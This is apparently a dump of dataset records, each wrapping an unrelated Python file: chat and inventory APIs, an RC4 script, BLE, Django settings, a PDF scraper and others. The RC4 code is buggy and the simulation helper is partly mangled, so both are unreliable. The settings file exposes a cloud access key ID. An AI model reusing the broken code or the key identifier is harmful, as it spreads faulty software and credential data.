requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={quote_ticker}&tsyms={base_ticker}')\r\n total_base = json.loads(r.content)[keys[base]]\r\n text = f'Цена {amount} {quote} в {base} - {total_base}'\r\n bot.send_message(message.chat.id, text)\r\n\r\nbot.polling()","sub_path":"copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101960912","text":"from random import *\nimport math\nimport sys\nclass moteC:\n \n \n def __init__(self, locX,locY,moteID):\n self.x = locX\n self.y = locY\n self.ID = moteID\n self.neighborList = []\n self.routeeList =[]\n def addNeighbor(self, neighborMote):\n self.neighborList.append(neighborMote)\n \n def euclideanDist(self, mote): \n return math.sqrt(pow(self.x-mote.x,2)+pow(self.y-mote.y,2))\n \n def isNeighbor(self, mote, threshold):\n return threshold>self.euclideanDist(mote)\n \n def addRoutee(self, rout):\n self.routeeList.append(rout)\n \n def setHop(self, hop):\n self.hop = hop\n \n def setBootTime(self,bootTime):\n self.bootTime = bootTime\n \n \ndef readTopology(fileName,r):\n\n f = open(fileName, \"r\")\n\n lines = f.readlines()\n i =0\n for line in lines:\n s = line.split()\n \n if (len(s) > 0):\n if (s[0] == \"gain\"):\n \n #print \" \", s[1], \" \", s[2], \" \", s[3];\n r.add(int(s[1]), int(s[2]), float(s[3]));\n f.close()\n \n \n \ndef getMotelist(fileName, ml):\n f = open(fileName, \"r\")\n lines = f.readlines()\n i =-1\n for line in lines:\n if i>=0:\n s = line.split()\n if(len(s) >0):\n ml.append(moteC(int(s[0]),int(s[1]),i))\n i+=1\n f.close()\n return i\n \ndef getNeighbor(fileName, ml,nN):\n f = open(fileName, \"r\")\n lines = f.readlines()\n i =0\n for line in lines:\n s = line.split()\n if len(s)>0 and i0 and i res else res\n \n return res\n \ndef bfs(target, node):\n queue=[node]\n visited={node}\n hop=0\n while True:\n buf = []\n for n in queue:\n if n.ID == target.ID: return hop\n for nei in n.neighborList:\n if nei not in visited:\n visited.add(nei)\n buf.append(nei)\n del queue[:]\n queue=[i for i in buf]\n hop+=1;\n if hop>10 : return hop \n \ndef getCenter(x,y,areaList):\n if not areaList.any():\n return []\n dis = pow(x-areaList[0].x,2)+pow(y-areaList[0].y,2) \n res = areaList[0]\n for node in areaList:\n curDis = pow(x-node.x,2)+pow(y-node.y,2) \n if dis > curDis:\n dis = curDis\n res = node\n return res\n \n","sub_path":"simulation/Users/0.733074/SimHelper.py","file_name":"SimHelper.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"522496942","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © Spyder Project Contributors\n# Licensed under the terms of the MIT License\n# (see spyder/__init__.py for details)\n\n\"\"\"Spyder API Version.\"\"\"\n\nVERSION_INFO = (0, 1, 0)\n__version__ = '.'.join(map(str, VERSION_INFO))\n","sub_path":"spyder/api/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"584764564","text":"#读取密钥,存放在key中\r\nimport math\r\nimport numpy as np\r\nkey = np.loadtxt( \"Input.txt\",dtype=int,delimiter=' ' )\r\nkeylen = len( key )\r\n\r\n#初始化\r\nS = [ ]\r\nT = [ ]\r\nfor i in range( 0,256 ):\r\n S.append( i )\r\n T.append( key[ i % keylen ] )\r\n\r\n#S的初始置换\r\nj = 0\r\nfor i in range( 0,256 ):\r\n j = ( j + S[ i ] + T[ i ] ) % 256\r\n #swap(S[i],S[j])\r\n temp = S[ i ]\r\n S[ i ] = S[ j ]\r\n S[ j ] = temp\r\n\r\n#读取比特流\r\nwith open( \"bitstream.txt\", \"r\" ) as f: #打开文件\r\n bitstream = f.read( ) #读取文件\r\nM = list( bitstream )\r\nMM = list( map( int, M ) )\r\nif len(MM)!=256*8:\r\n print(\"ERROR\")\r\n exit(0)\r\nMessage=[]\r\nCipher=[0]*256\r\nfor i in range(0,256):\r\n split=MM[i*8:i*8+8]\r\n for j in range(0,len(split)):\r\n temp=temp+math.pow(2,7-j)\r\n Message.append(temp)\r\n\r\ni = j = 0\r\nfor p in range(0,256):\r\n i = (i + 1) % 256\r\n j = (j + S[i]) % 256\r\n #swap(S[i],S[j])\r\n temp = S[ i ]\r\n S[ i ] = S[ j ]\r\n S[ j ] = temp\r\n t = (S[i] + S[j]) % 256\r\n Cipher[i] = MM[i] ^ S[t]\r\nCiphertext=[]\r\nfor i in range(0,256):\r\n temp=str(bin(Cipher[i]))\r\n temp1=temp[2:]\r\n Ciphertext.append(temp1)\r\nresult=\"\".join(Ciphertext)\r\n#输出密文到Ciphertext.txt中\r\nwith open( \"Ciphertext.txt\",\"w\" ) as f:\r\n f.write( result ) \r\n\r\n","sub_path":"RC4.py","file_name":"RC4.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"381844809","text":"def fact(n):\n if n == 0:\n return 1\n else:\n return n * fact(n - 1)\ndef fact(m):\n if m == 0:\n return 1\n else:\n return m * fact(m - 1)\nwhile True:\n n = int(input(\"Enter n:\"))\n if n < 0 :\n break\n else:\n m = int(input(\"Enter m:\"))\n a = int(fact(n)/(fact(m)*fact(n - m)))\n print(\"C(%d,%d) = %d\" %(n, m, a))\n","sub_path":"week4/20171675-이인호-assignment4.py","file_name":"20171675-이인호-assignment4.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"348224461","text":"from gi.repository import GLib\n\n# Bluezero modules\nfrom bluezero import adapter\nfrom bluezero import peripheral\n\n# constants\nUART_SERVICE = '6E400001-B5A3-F393-E0A9-E50E24DCCA9E'\nRX_CHARACTERISTIC = '6E400002-B5A3-F393-E0A9-E50E24DCCA9E'\nTX_CHARACTERISTIC = '6E400003-B5A3-F393-E0A9-E50E24DCCA9E'\n\ntx_obj = None\n\n\ndef uart_notify(notifying, characteristic):\n global tx_obj\n if notifying:\n tx_obj = characteristic\n else:\n tx_obj = None\n\n\ndef update_tx(value):\n if tx_obj:\n tx_obj.set_value(value)\n\n\ndef uart_write(value, options):\n print('raw bytes:', value)\n print('With options:', options)\n print('Text value:', bytes(value).decode('utf-8'))\n update_tx(value)\n\n\ndef main(adapter_address):\n ble_uart = peripheral.Peripheral(adapter_address, local_name='BLE UART')\n ble_uart.add_service(srv_id=1, uuid=UART_SERVICE, primary=True)\n ble_uart.add_characteristic(srv_id=1, chr_id=1, uuid=RX_CHARACTERISTIC,\n value=[], notifying=False,\n flags=['write', 'write-without-response'],\n write_callback=uart_write,\n read_callback=None,\n notify_callback=None)\n ble_uart.add_characteristic(srv_id=1, chr_id=2, uuid=TX_CHARACTERISTIC,\n value=[], notifying=False,\n flags=['notify'],\n notify_callback=uart_notify,\n read_callback=None,\n write_callback=None)\n ble_uart.publish()\n\n\nif __name__ == '__main__':\n main(list(adapter.Adapter.available())[0].address)\n","sub_path":"examples/ble_uart.py","file_name":"ble_uart.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"292104093","text":"from .base import *\n\nDEBUG = False\nALLOWED_HOSTS = ['hack.lug.ustc.edu.cn']\nMEDIA_ROOT = '/var/opt/hackergame/media'\nSTATIC_ROOT = '/var/opt/hackergame/static'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'hackergame',\n 'USER': 'hackergame',\n 'CONN_MAX_AGE': 60,\n 'ATOMIC_REQUESTS': True,\n },\n}\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': '127.0.0.1:11211',\n 'TIMEOUT': 3600,\n 'KEY_PREFIX': 'hackergame',\n },\n}\nSESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'mail.s.ustclug.org'\n\nGOOGLE_APP_ID = '2574063612-kstsrirbttbimgk2da2ju1mmbh8t0ogk' \\\n '.apps.googleusercontent.com'\nMICROSOFT_APP_ID = '6a243fe9-a603-4c6e-b6bd-5af20b7f460e'\nSMS_ACCESS_KEY_ID = 'LTAI4FmgeKHNWB7WbTwTP7d9'\n","sub_path":"conf/settings/hackergame.py","file_name":"hackergame.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"283963421","text":"import random\nclass Resistor:\n def __init__(self,x,y,resist,group_in,group_out):\n self.position_x = x\n self.position_y = y\n self.resist = resist\n self.group_in = group_in\n self.group_out = group_out\n\n def show_position(self):\n return([self.position_x,self.position_y,])\n def show_connection(self):\n return([self.group_in,self.group_out])\n\nclass Link:\n def __init__(self,x,y,x2,y2):\n self.position_start_x = x\n self.position_start_y = y\n self.position_end_x = x2\n self.position_end_y = y2\n\n def show_position(self):\n print(self.position_start_x,self.position_start_y,self.position_end_x,self.position_end_y)\n\ndef read_object(path):\n object = open(path, 'r')\n ObjectArray = object.read().splitlines()\n\n for index in range(len(ObjectArray)):\n ObjectArray[index] = ObjectArray[index].split()\n print(ObjectArray[1])\n ObjectClassArray = []\n for index in range(len(ObjectArray)):\n if ObjectArray[index][0] == 'Resi' :\n ObjectClassArray.append(Resistor(ObjectArray[index][1],ObjectArray[index][2],ObjectArray[index][3],ObjectArray[index][4],ObjectArray[index][5]))\n\n if ObjectArray[index][0] == 'Link' :\n ObjectClassArray.append(Link(ObjectArray[index][1],ObjectArray[index][2],ObjectArray[index][3],ObjectArray[index][4]))\n\n return(ObjectClassArray[1].show_connection(),'Connection')\n\n\ndef Generate_resistor(range_pos,renge_resist):\n Type = \"Resi\"\n x = random.randrange(0,range_pos,1)\n y = random.randrange(0,range_pos,1)\n resist = random.randrange(0,renge_resist,10)\n return([Type,x,y,resist])\n\ndef Generate_file(path):\n File = open(path,'w')\n FileText=[]\n\n for index in range(10):\n FileText.append(Generate_resistor(10,100))\n\n File.write(str(FileText))\n","sub_path":"Modules/Math.py","file_name":"Math.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"645815199","text":"#creat data set\nvocab = ['go', 'to', 'agent', 'red', 'green', 'blue', 'landmark',\n 'circle', 'triangle', 'continue', 'next', 'ahead', 'done',\n 'good', 'stay', 'goal']\n\ncolors = ['red', 'green', 'blue']\nshapes = ['circle', 'triangle']\n\nsentence_form = [\" agent go to landmark\",\n \" agent go to landmark\",\n \" agent go to landmark\",\n \" agent go to landmark\",\n \" agent go to landmark\",\n \" agent stay\",\n \" agent stay\",\n \" agent stay\",\n \" agent continue\",\n \" agent continue\",\n \" agent continue\",\n \" agent is done\",\n \" agent is done\",\n \" agent is done\"\n \" good job\",\n \" good job\",\n \" good job\",\n \"you go girl\"]\n\n\n\ndef create_dataset(res):\n for shape1 in shapes:\n for color1 in colors:\n for shape2 in shapes:\n for color2 in colors:\n tmp = sentence_form.copy()\n tmp = [t.replace(\"\", color1).replace(\"\", shape1).replace(\"\", color2).replace(\"\", shape2) for t in tmp]\n res+=tmp\n print(list(set(res)))\n\n\ncreate_dataset([])","sub_path":"create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386434108","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @File : email_send.py\n# @author : Jaxon\n# @software: PyCharm\n# @datetime: 10/27 027 上午 10:58\nfrom random import Random\nfrom django.core.mail import send_mail\n\nfrom users.models import EmailVerifyRecord\nfrom MxOnline.settings import EMAIL_FROM\n\n\ndef generate_random_str(random_length=10):\n random_str = \"\"\n chars = \"AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789\"\n length = len(chars) - 1\n random = Random()\n for i in range(random_length):\n random_str += chars[random.randint(0, length)]\n return random_str\n\n\ndef send_register_email(email, send_type=\"register\"):\n email_record = EmailVerifyRecord()\n if send_type == \"update_email\":\n random_str = generate_random_str(6)\n else:\n random_str = generate_random_str(20)\n email_record.code = random_str\n email_record.email = email\n email_record.send_type = send_type\n email_record.save()\n\n email_title, email_body = \"\", \"\"\n if send_type == \"register\":\n email_title, email_body = (\n u\"慕学在线网注册激活链接\",\n u\"请将链接复制到浏览器访问以便激活你的账号完成注册:http://127.0.0.1:8000/active/{0}\".format(random_str)\n )\n send_count = 0\n while send_count < 3:\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n if send_status:\n break\n send_count += 1\n\n elif send_type == \"forget\":\n email_title, email_body = (\n u\"慕学在线网密码重置链接\",\n u\"请将链接复制到浏览器访问以便重置你的账号密码:http://127.0.0.1:8000/reset/{0}\".format(random_str)\n )\n send_count = 0\n while send_count < 3:\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n if send_status:\n break\n send_count += 1\n\n elif send_type == \"update_email\":\n email_title, email_body = (\n u\"慕学在线邮箱修改验证码\",\n u\"你的邮箱验证码为:{0}\".format(random_str)\n )\n send_count = 0\n while send_count < 3:\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n if send_status:\n break\n send_count += 1\n","sub_path":"apps/utils/email_send.py","file_name":"email_send.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66273525","text":"import csv\nimport re\nimport urllib\nimport requests\nfrom subprocess import Popen, PIPE\n\n\nPDF_LINK = 'http://nycprop.nyc.gov/nycproperty/StatementSearch'\nTIMEOUT = 15\n\n\ndef get_content(pdf_link):\n try:\n resp = requests.get(pdf_link, timeout=TIMEOUT)\n except requests.exceptions.ReadTimeout:\n raise RuntimeError('fetch timedout')\n except requests.exceptions.ConnectionError:\n raise RuntimeError('connection error')\n except Exception as e:\n raise RuntimeError(str(e))\n\n content = resp.content\n\n html = content.decode('latin1')\n if 'could not be found' in html:\n raise RuntimeError('html pulled - not pdf')\n\n return content\n\n\ndef get_pdf_text(content):\n ps2ascii = Popen(['ps2ascii'], stdin=PIPE, stdout=PIPE,\n stderr=PIPE, shell=True)\n ps2ascii.stdin.write(content)\n ps2ascii.stdin.close()\n pdf_text = ps2ascii.stdout.read().decode()\n ps2ascii.stdout.close()\n ps2ascii.wait()\n return pdf_text\n\n\ndef get_bbl_list(infile):\n with open(infile) as fp:\n reader = csv.reader(fp)\n next(reader) # remove header\n rows = [tuple(map(int, row[:3])) for row in reader]\n\n i = 0\n #for i, tup in enumerate(rows):\n # if tup == (3,1507,4):\n # break\n\n return rows[i:]\n\n\ndef parse_for_charges(text):\n match = re.search(r'\\$([\\d,]+)', text)\n try:\n return int(match.groups(1)[0].replace(',', ''))\n except:\n return 0\n\n\ndef get_charges_lines(lines):\n search_strings = (\n 'Unpaid charges, if any',\n 'Outstanding Charges',\n )\n\n return [line for line in lines for search_string in search_strings if search_string in line]\n\n\ndef get_address(lines):\n line = None\n for line in lines:\n line = line.lower()\n if 'property address:' in line:\n break\n\n if line is None:\n return 'NO ADDRESS'\n\n start = line.find('property address:') + len('property address:')\n end = line.find('borough, block & lot:')\n if end == -1:\n return line[start:].strip()\n else:\n return line[start:end].strip()\n\n\ndef get_owner(lines):\n line = None\n for line in lines:\n line = line.lower()\n if 'owner name:' in line:\n break\n\n if line is None:\n return 'NO OWNER'\n\n start = line.find('owner name:') + len('owner name:')\n end = line.find('property address:')\n if end == -1:\n return line[start:].strip()\n else:\n return line[start:end].strip()\n\n\ndef write_row_factory(outfile):\n with open(outfile, 'a') as fp:\n fp.write('borough,block,lot,pdf_link,status,owner,address,due\\n')\n\n def write_row(borough, block, lot, pdf_link,\n status='', owner='', address='', due=''):\n tup = borough, block, lot, pdf_link, status, owner, address, due\n with open(outfile, 'a') as fp:\n writer = csv.writer(fp)\n writer.writerow(tup)\n\n return write_row\n\n\ndef main(infile, outfile):\n\n bbl_list = get_bbl_list(infile)\n\n write_row = write_row_factory(outfile)\n\n #bbl_list = (\n # (3, 4647, 4), # 816 LENOX RD.\n # (3, 4229, 3), # 243 FOUNTAIN AVE.\n # (3, 3690, 2), # 155 WYONA ST\n # (3, 1837, 67), # 77 HALSEY ST\n #)\n\n #bbl_list = ((3, 1343, 41),)\n #bbl_list = ((1, 1918, 159),)\n for borough, block, lot in bbl_list:\n\n query = {\n 'bbl': '{0}{1:05d}{2:04d}'.format(borough, block, lot),\n 'stmtDate': '20170602',\n 'stmtType': 'SOA',\n }\n query_string = urllib.parse.urlencode(query)\n\n pdf_link = PDF_LINK + '?' + query_string\n\n try:\n content = get_content(pdf_link)\n except Exception as e:\n write_row(borough, block, lot, pdf_link, str(e))\n continue\n\n text = get_pdf_text(content)\n\n text_lines = text.split('\\n')\n\n address = get_address(text_lines)\n\n owner = get_owner(text_lines)\n\n charge_lines = get_charges_lines(text_lines)\n due = sum(map(parse_for_charges, charge_lines))\n\n status = 'unpaid' if due > 0 else 'paid'\n\n write_row(borough, block, lot, pdf_link,\n status=status, owner=owner, address=address, due=due)\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('infile')\n parser.add_argument('outfile')\n args = parser.parse_args()\n main(args.infile, args.outfile)\n\n","sub_path":"fetch_and_parse_pdf.py","file_name":"fetch_and_parse_pdf.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"121716683","text":"from flask import Flask\nfrom flask_restful import Resource, Api, reqparse\n\napp = Flask(__name__)\napi = Api(app)\n\nWAREHOUSE = {'432.1': 11,\n '432.2': 22,\n '555.1': 0}\n\n\nclass Inventory(Resource):\n\n def generate_key(self, product_id, size):\n return \"{}.{}\".format(product_id, size)\n\n def post(self, product_id, size):\n key = self.generate_key(product_id, size)\n if key in WAREHOUSE.keys():\n return 'Inventory record already exists.', 403\n else:\n WAREHOUSE[key] = 1\n return {key: WAREHOUSE[key]}\n\n def get(self, product_id, size):\n key = self.generate_key(product_id, size)\n return {key: WAREHOUSE[key]}\n\n def put(self, product_id, size):\n key = self.generate_key(product_id, size)\n\n if key in WAREHOUSE.keys():\n WAREHOUSE[key] += 1\n else:\n return 'No inventory record to update. First, create.', 403\n return {key: WAREHOUSE[key]}, 200\n\n def delete(self, product_id, size):\n key = self.generate_key(product_id, size)\n if key not in WAREHOUSE.keys():\n return 'No inventory.', 403\n if WAREHOUSE[key] > 0:\n WAREHOUSE[key] -= 1\n else:\n return 'Inventory empty.', 403\n return {key: WAREHOUSE[key]}\n\napi_url = '/inventory//'\n\napi.add_resource(Inventory, api_url)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"591529110","text":"import sys\r\nfrom optparse import OptionParser\r\n\r\nfrom .task_to_app_queue import task_to_app_queue\r\nfrom .run_mitmdump import run_mitmdump\r\n\r\n\r\ndef get_options():\r\n parser = OptionParser()\r\n parser.add_option('-e', '--environment', dest='environment', help='choose environment to run',\r\n metavar='ENVIRONMENT')\r\n # 选择程序运行目标,appium for 操作手机,mitmdump for 数据拦截,mq for 队列合并\r\n parser.add_option('-t', '--type', dest='task_type',\r\n help='choose a process to run: appium, mitmdump or mq', metavar='TASK_TYPE')\r\n\r\n # 队列合并,源队列的名称由内核名称构成\r\n parser.add_option('-s', '--spider', dest='spider_name', help='choose a queue to consume',\r\n metavar='SPIDER')\r\n\r\n parser.add_option('-q', '--queue', dest='queue', help='choose meta or search', metavar='QUEUE')\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef bootstrap():\r\n (options, args) = get_options()\r\n # 获取环境\r\n if not options.environment:\r\n environment = 'local'\r\n else:\r\n environment = options.environment\r\n # 获取任务类型\r\n task_type = options.task_type\r\n # 获取队列环境 meta or search\r\n queue_env = options.queue\r\n # 获取爬虫名称\r\n spider = options.spider_name\r\n\r\n if task_type == 'mq':\r\n task_to_app_queue(spider_name=spider, environment=environment, queue_env=queue_env)\r\n\r\n if task_type == 'mitmdump':\r\n run_mitmdump(environment=environment, queue_env=queue_env)\r\n","sub_path":"auto_mobile/sentiment/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"136390646","text":"import subprocess\n\nip_list = [\"192.168.150.50\", \n \"192.168.150.71\", \n \"192.168.150.75\", \n \"192.168.150.77\", \n \"192.168.150.78\", \n \"192.168.150.91\", \n \"192.168.150.92\", \n \"192.168.150.93\",\n \"www.google.com\"]\n\nwhile True:\n all_restarted = []\n alive = []\n for ip in ip_list:\n command = ip\n ip_id = \"ip_\"+command[-2:]\n if ip_id == \"ip_om\":\n ip_id = \"google\"\n\n \n p = subprocess.Popen(\"screen -ls %s\"%ip_id, shell=True, stdout=subprocess.PIPE).stdout.read()\n p = p.splitlines()[1:][:-1]\n \n if len(p)== 0 :\n all_restarted.append(command)\n subprocess.run([\"screen -dmS %s sudo python3 /var/www/html/python/src/network/network_checker.py %s\" %(ip_id,command)], shell=True)\n else:\n alive.append(command)\n # if len(p) > 1:\n # for id in p:\n # pid = id.split(\".\")[0].replace(\"\\t\",\"\")\n # print (\"screen -R %s -X quit\"%pid)\n # subprocess.run([\"screen -R %s -X quit\"%pid],shell=True) \n \n \n print (\"All restarted monitoring ==> \"),\n print (all_restarted)\n print (\"Alive ==> \"),\n print (alive)\n\n if len(all_restarted) == 0 :\n print (\" All network is alive \")\n print (\"---------\")\n else:\n print (\" All restarted network \")\n print (all_restarted)\n print (\"---------\")","sub_path":"python/src/network/script_checker.py","file_name":"script_checker.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"268574757","text":"# Iterative method\ndef addDigits(num):\n digital_root = 0\n while num > 0:\n digital_root += num % 10\n num //= 10\n\n if num == 0 and digital_root > 9:\n num = digital_root\n digital_root = 0\n \n return digital_root\n\n# Recursive method\ndef addDigits1(num):\n if num < 9:\n return num\n\n digital_root = 0\n while num > 0:\n digital_root += num % 10\n num //= 10\n\n return addDigits1(digital_root)\n\n# Mathematics solution\ndef addDigits2(num):\n if num == 0:\n return 0\n elif num % 9 == 0:\n return 9\n else:\n return num % 9\n\n# one liner solution for addDigits2\ndef addDigits3(num):\n return (num % 9 or 9) if num else 0\n\n# If we combine last 2 cases of mathematics solution\ndef addDigits4(num):\n if num == 0:\n return 0\n else:\n return 1 + (num - 1) % 9\n\n# One liner solution for addDigits4\ndef addDigits5(num):\n return 1 + (num - 1) % 9 if num else 0\n \n\nprint(addDigits5(38))","sub_path":"july-leetcoding-challenge/D26-AddDigits.py","file_name":"D26-AddDigits.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157758188","text":"from typing import Pattern\nimport uvicorn\n\nfrom fastapi import Depends, FastAPI, HTTPException\nimport os\n# from fastapi_sqlalchemy import DBSessionMiddleware\n# from fastapi_sqlalchemy import db\nimport models\n# from models import User as baseuser, Mobile,Channel,Group,Message\nimport schema\nfrom dotenv import load_dotenv\nfrom sqlalchemy.orm import Session, session\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nload_dotenv(os.path.join(BASE_DIR, \".env\"))\nfrom database import SessionLocal, engine\nimport uuid\nfrom sqlalchemy import or_\nfrom datetime import datetime\nimport re\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI()\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n\n@app.post(\"/mobile/\", response_model=schema.Mobile)\ndef create_mobile(mobile: schema.Mobile, db: Session = Depends(get_db)):\n '''\n API Name: create_mobile\n purpose : To add a valid 10 digit number that starts wih 7or 8 or 9\n permission : permission not required\n parameters :\n number = string (of 10 digits)\n request body :\n \"number\" : \"9989988988\"\n response body :\n {\n \"number\" : \"9989988988\"\n } \n '''\n number = re.fullmatch(\"[7-9]\\d{9}\",mobile.number)\n if not number:\n raise HTTPException(status_code=400, detail=\"please add valid number\")\n db_mobile = models.Mobile(number=mobile.number)\n db.add(db_mobile)\n db.commit()\n db.refresh(db_mobile)\n return db_mobile\n\n\n@app.post(\"/bulkmobile/\")\ndef create_BulkMobile(db: Session= Depends(get_db)):\n '''\n API Name: create_BulkMobile\n Method : POST\n purpose : To create 9 numbers for easily adding\n permission : permission not required\n parameters :\n None\n request body :\n None\n response body :\n {\n \"data\": None,\n \"message\": \"Success\"\n } \n '''\n mobileList = ['9123456784','8123456784','7123456785',\n '9080390801','9080123456','9123456789',\n '9080790807','9123456780','7878789089']\n try:\n for number in mobileList:\n db_mobile = models.Mobile(number= number)\n db.add(db_mobile)\n db.commit()\n return {\"data\":None,\"message\":\"Success\"}\n except Exception as e:\n db.rollback()\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.get(\"/getNumber/{current_number}\")\ndef get_number(current_number: str ,db: Session= Depends(get_db)):\n '''\n API Name: get_number\n Method: GET\n purpose : To get all the numbers other than the given number\n permission : permission not required\n parameters :\n current_number = string (of 10 digits)\n request body :\n \"current_number\" : \"9989988988\"\n response body :\n {\n \"data\": [\n \"9123456784\",\n \"8123456784\",\n \"7123456785\",\n \"9086012345\",\n \"90860123456\",\n \"908601234567\"\n ],\n \"message\": \"Success\"\n }\n '''\n try:\n mobileList = []\n mobiles = db.query(models.Mobile).filter(models.Mobile.number!= current_number).all()\n for mobile in mobiles:\n mobileList.append(mobile.number)\n return {\"data\":mobileList,\"message\":\"Success\"}\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.get(\"/checkConnection/{current_number}/{other_number}\")\ndef get_connection(current_number: str, other_number: str, db: Session = Depends(get_db)):\n try:\n groupName1 = current_number+\"-\"+other_number\n groupName2 = other_number+\"-\"+current_number\n try:\n checkGroup = db.query(models.Channel).filter(or_(models.Channel.channelName == groupName1,models.Channel.channelName == groupName2)).one()\n messageList = []\n messages = db.query(models.Message).join(models.Mobile, models.Message.mobile_id == models.Mobile.id).filter(models.Message.channel_id == checkGroup.id).order_by(models.Message.createdTime.desc()).all()\n for message in messages:\n data = {\n \"sender\" : message.mobile.number,\n \"message\": message.message,\n \"messageId\": message.messageID,\n \"reciever\": other_number if message.mobile.number == current_number else current_number,\n \"createdTime\": datetime.timestamp(message.createdTime)\n }\n messageList.append(data)\n currentUser = db.query(models.Mobile).filter(models.Mobile.number == current_number).one() \n finalData = {\n \"messageList\" : messageList,\n \"mobile_id\" : currentUser.id,\n \"channel_id\" : checkGroup.id\n }\n return {\"data\":finalData,\"message\":\"Success\"}\n except:\n \n checkGroup = db.query(models.Channel).filter(or_(models.Channel.channelName == groupName1,models.Channel.channelName == groupName2)).count()\n if checkGroup:\n raise HTTPException(status_code=400, detail=\"Something went wrong\")\n \n db_channel = models.Channel(channelName=groupName1)\n db.add(db_channel)\n db.commit()\n db.refresh(db_channel)\n try:\n numberList = [current_number, other_number]\n for i in numberList:\n mobile = db.query(models.Mobile).filter(models.Mobile.number ==i).one()\n db_group = models.Group(mobile_id=mobile.id,Channel_id=db_channel.id)\n db.add(db_group)\n db.commit()\n currentUser = db.query(models.Mobile).filter(models.Mobile.number == current_number).one()\n finalData = {\n \"messageList\" : [],\n \"mobile_id\" : currentUser.id,\n \"channel_id\" : db_channel.id\n }\n return {\"data\":finalData,\"message\":\"Success\"}\n except Exception as e:\n db.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.post(\"/createMessage/\")\ndef create_message(message: schema.Message, db: Session= Depends(get_db)):\n '''\n API Name: create_message\n purpose : To write a message in particular channel\n Method : POST\n permission : permission not required\n parameters :\n message = string\n mobile_id = int\n channel_id = int\n request body :\n {\n \"message\": \"string\",\n \"channel\": 0,\n \"mobile\": 0\n }\n response body :\n {\n \"data\" : \"Success\"\n } \n '''\n try:\n db_message = models.Message(message= message.message, channel_id=message.channel,mobile_id = message.mobile)\n db.add(db_message)\n db.commit()\n return {\"data\":\"success\"}\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.get(\"/getmessages/{channel_id}\")\ndef get_messages(channel_id:int, db: Session= Depends(get_db)):\n try:\n messageList = []\n messages = db.query(models.Message).filter(models.Message.channel_id == channel_id).all()\n for message in messages:\n messageList.append(message)\n return {\"data\":messageList,\"message\":\"success\"}\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129068614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom chainer import optimizer as optimizer_module\nfrom chainer import variable\nfrom chainer.dataset import iterator as iterator_module\nfrom chainer.dataset import convert\nfrom chainer.training import StandardUpdater\n\nimport copy\nimport six\n\n\nclass 